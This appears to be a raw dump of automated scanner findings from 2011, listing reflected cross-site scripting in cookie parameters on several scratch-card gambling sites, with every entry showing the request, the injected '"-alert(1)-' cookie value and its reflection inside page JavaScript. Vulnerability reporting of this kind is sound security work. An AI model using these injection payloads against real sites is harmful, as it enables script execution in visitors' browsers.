HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:05:04 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM8644e" Set-Cookie: BO=FM; domain=bigmoneyscratch Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch Set-Cookie: CountryCode=US; domain=bigmoneyscratch Set-Cookie: CSITemp=12; domain=bigmoneyscratch Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 58730 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM8644e"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bigmoneys |
Path: | /Mobile.aspx |
GET /Mobile.aspx HTTP/1.1 Host: www.bigmoneyscratch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:06:05 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch Set-Cookie: BO=FMdf086"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch Set-Cookie: CountryCode=US; domain=bigmoneyscratch Set-Cookie: CSITemp=12; domain=bigmoneyscratch Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 87806 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FMdf086"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bigmoneys |
Path: | /Mobile.aspx |
GET /Mobile.aspx HTTP/1.1 Host: www.bigmoneyscratch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:05:42 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PMb14d3" Set-Cookie: BO=FM; domain=bigmoneyscratch Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch Set-Cookie: CountryCode=US; domain=bigmoneyscratch Set-Cookie: CSITemp=12; domain=bigmoneyscratch Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 87805 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PMb14d3"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bigmoneys |
Path: | /PlayersClub.aspx |
GET /PlayersClub.aspx HTTP/1.1 Host: www.bigmoneyscratch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:05:50 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch Set-Cookie: BO=FMd53d2"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch Set-Cookie: CountryCode=US; domain=bigmoneyscratch Set-Cookie: CSITemp=12; domain=bigmoneyscratch Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 55179 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FMd53d2"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bigmoneys |
Path: | /PlayersClub.aspx |
GET /PlayersClub.aspx HTTP/1.1 Host: www.bigmoneyscratch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:05:30 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM6bab6" Set-Cookie: BO=FM; domain=bigmoneyscratch Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch Set-Cookie: CountryCode=US; domain=bigmoneyscratch Set-Cookie: CSITemp=12; domain=bigmoneyscratch Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 55180 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM6bab6"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bigmoneys |
Path: | /Promotions.aspx |
GET /Promotions.aspx HTTP/1.1 Host: www.bigmoneyscratch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:05:24 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch Set-Cookie: BO=FM3ad17"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch Set-Cookie: CountryCode=US; domain=bigmoneyscratch Set-Cookie: CSITemp=12; domain=bigmoneyscratch Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 49469 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FM3ad17"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bigmoneys |
Path: | /Promotions.aspx |
GET /Promotions.aspx HTTP/1.1 Host: www.bigmoneyscratch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:05:04 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PMeda30" Set-Cookie: BO=FM; domain=bigmoneyscratch Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch Set-Cookie: CountryCode=US; domain=bigmoneyscratch Set-Cookie: CSITemp=12; domain=bigmoneyscratch Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 49469 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PMeda30"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bigmoneys |
Path: | /Responsible.aspx |
GET /Responsible.aspx HTTP/1.1 Host: www.bigmoneyscratch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:08:46 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch Set-Cookie: BO=FMeebb2"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch Set-Cookie: CountryCode=US; domain=bigmoneyscratch Set-Cookie: CSITemp=12; domain=bigmoneyscratch Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 52867 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FMeebb2"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bigmoneys |
Path: | /Responsible.aspx |
GET /Responsible.aspx HTTP/1.1 Host: www.bigmoneyscratch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:08:13 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM5946a" Set-Cookie: BO=FM; domain=bigmoneyscratch Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch Set-Cookie: CountryCode=US; domain=bigmoneyscratch Set-Cookie: CSITemp=12; domain=bigmoneyscratch Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 52867 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM5946a"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bigmoneys |
Path: | /SecurityAndPrivacy.aspx |
GET /SecurityAndPrivacy.aspx HTTP/1.1 Host: www.bigmoneyscratch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:08:23 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch Set-Cookie: BO=FMae4cb"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch Set-Cookie: CountryCode=US; domain=bigmoneyscratch Set-Cookie: CSITemp=12; domain=bigmoneyscratch Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 46640 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FMae4cb"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bigmoneys |
Path: | /SecurityAndPrivacy.aspx |
GET /SecurityAndPrivacy.aspx HTTP/1.1 Host: www.bigmoneyscratch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:08:05 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM248d6" Set-Cookie: BO=FM; domain=bigmoneyscratch Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch Set-Cookie: CountryCode=US; domain=bigmoneyscratch Set-Cookie: CSITemp=12; domain=bigmoneyscratch Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 46640 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM248d6"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bigmoneys |
Path: | /Terms.aspx |
GET /Terms.aspx HTTP/1.1 Host: www.bigmoneyscratch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:08:58 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch Set-Cookie: BO=FM4217c"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch Set-Cookie: CountryCode=US; domain=bigmoneyscratch Set-Cookie: CSITemp=12; domain=bigmoneyscratch Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 109535 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FM4217c"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bigmoneys |
Path: | /Terms.aspx |
GET /Terms.aspx HTTP/1.1 Host: www.bigmoneyscratch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:08:18 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM8fcb8" Set-Cookie: BO=FM; domain=bigmoneyscratch Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch Set-Cookie: CountryCode=US; domain=bigmoneyscratch Set-Cookie: CSITemp=12; domain=bigmoneyscratch Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 109532 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM8fcb8"-alert(1)-"5c11f941"; var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bigmoneys |
Path: | /UnderAge.aspx |
GET /UnderAge.aspx HTTP/1.1 Host: www.bigmoneyscratch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:09:44 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch Set-Cookie: BO=FM233fb"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch Set-Cookie: CountryCode=US; domain=bigmoneyscratch Set-Cookie: CSITemp=12; domain=bigmoneyscratch Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 45871 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FM233fb"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bigmoneys |
Path: | /UnderAge.aspx |
GET /UnderAge.aspx HTTP/1.1 Host: www.bigmoneyscratch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:08:58 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM530ff" Set-Cookie: BO=FM; domain=bigmoneyscratch Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch Set-Cookie: CountryCode=US; domain=bigmoneyscratch Set-Cookie: CSITemp=12; domain=bigmoneyscratch Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 45872 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM530ff"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.hopa.com |
Path: | / |
GET / HTTP/1.1 Host: www.hopa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:12:45 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=hopa.com; expires=Fri, 16-May-2014 12:12:45 GMT; path=/ Set-Cookie: BO=FMbd50c"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=hopa.com; expires=Fri, 16-May-2014 12:12:45 GMT; path=/ Set-Cookie: CountryCode=US; domain=hopa.com; expires=Fri, 16-May-2014 12:12:45 GMT; path=/ Set-Cookie: CSITemp=4; domain=hopa.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 44729 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FMbd50c"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.hopa.com |
Path: | / |
GET / HTTP/1.1 Host: www.hopa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:11:59 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM39c1f" Set-Cookie: BO=FM; domain=hopa.com; expires=Fri, 16-May-2014 12:11:59 GMT; path=/ Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=hopa.com; expires=Fri, 16-May-2014 12:11:59 GMT; path=/ Set-Cookie: CountryCode=US; domain=hopa.com; expires=Fri, 16-May-2014 12:11:59 GMT; path=/ Set-Cookie: CSITemp=4; domain=hopa.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 44729 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM39c1f"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.info |
Path: | /AboutUs.aspx |
GET /AboutUs.aspx HTTP/1.1 Host: www.info.crazyscratch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A/ |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 11:50:41 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch Set-Cookie: BO=FM4ebf6"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch Set-Cookie: CountryCode=US; domain=info.crazyscratch Set-Cookie: CSITemp=28; domain=info.crazyscratch Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 57142 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FM4ebf6"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.info |
Path: | /AboutUs.aspx |
GET /AboutUs.aspx HTTP/1.1 Host: www.info.crazyscratch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A/ |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 11:50:04 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PMffd0a" Set-Cookie: BO=FM; domain=info.crazyscratch Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch Set-Cookie: CountryCode=US; domain=info.crazyscratch Set-Cookie: CSITemp=28; domain=info.crazyscratch Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 57142 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PMffd0a"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.info |
Path: | /ContactUsFax.aspx |
GET /ContactUsFax.aspx HTTP/1.1 Host: www.info.crazyscratch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A/ |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 11:51:44 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch Set-Cookie: BO=FMf8e84"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch Set-Cookie: CountryCode=US; domain=info.crazyscratch Set-Cookie: CSITemp=28; domain=info.crazyscratch Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 54701 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FMf8e84"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.info |
Path: | /ContactUsFax.aspx |
GET /ContactUsFax.aspx HTTP/1.1 Host: www.info.crazyscratch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A/ |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 11:51:08 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PMb0dfe" Set-Cookie: BO=FM; domain=info.crazyscratch Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch Set-Cookie: CountryCode=US; domain=info.crazyscratch Set-Cookie: CSITemp=28; domain=info.crazyscratch Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 54701 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PMb0dfe"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.info |
Path: | /ContactUsMail.aspx |
GET /ContactUsMail.aspx HTTP/1.1 Host: www.info.crazyscratch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A/ |
